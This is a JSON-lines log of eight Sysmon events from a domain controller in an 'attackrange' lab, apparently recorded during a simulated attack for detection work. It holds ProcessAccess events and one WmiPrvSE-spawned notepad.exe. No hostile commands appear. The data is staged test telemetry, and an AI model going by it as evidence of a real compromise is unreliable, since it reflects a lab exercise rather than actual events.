{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5443,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.299\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-001062D40800}\r\nTargetProcessId: 2788\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.299","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-001062D40800}","TargetProcessId":"2788","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5444,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.299\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-001062D40800}\r\nTargetProcessId: 2788\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.299","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-001062D40800}","TargetProcessId":"2788","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5445,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.343\r\nProcessGuid: {41C8662E-20D6-5F25-0000-00107FD70800}\r\nProcessId: 4508\r\nImage: C:\\Windows\\System32\\notepad.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Notepad\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: NOTEPAD.EXE\r\nCommandLine: notepad.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CF-5F25-0000-00209EF40700}\r\nLogonId: 0x7F49E\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=3B508CAE5DEBCBA928B5BC355517E2E6,SHA256=DA0ACEE8F60A460CFB5249E262D3D53211EBC4C777579E99C8202B761541110A,IMPHASH=968239BE2020F1C0DAFFDCDBD49E9C82\r\nParentProcessGuid: {41C8662E-20D1-5F25-0000-001016430800}\r\nParentProcessId: 4288\r\nParentImage: C:\\Windows\\System32\\wbem\\WmiPrvSE.exe\r\nParentCommandLine: C:\\Windows\\system32\\wbem\\wmiprvse.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.343","ProcessGuid":"{41C8662E-20D6-5F25-0000-00107FD70800}","Image":"C:\\Windows\\System32\\notepad.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Notepad","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"NOTEPAD.EXE","CommandLine":"notepad.exe","CurrentDirectory":"C:\\Windows\\system32\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CF-5F25-0000-00209EF40700}","LogonId":"0x7f49e","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=3B508CAE5DEBCBA928B5BC355517E2E6,SHA256=DA0ACEE8F60A460CFB5249E262D3D53211EBC4C777579E99C8202B761541110A,IMPHASH=968239BE2020F1C0DAFFDCDBD49E9C82","ParentProcessGuid":"{41C8662E-20D1-5F25-0000-001016430800}","ParentProcessId":"4288","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","ParentCommandLine":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5446,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.346\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.346","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5447,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.346\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.346","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5448,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.346\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.346","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5449,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.346\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.346","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5450,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.346\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.346","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
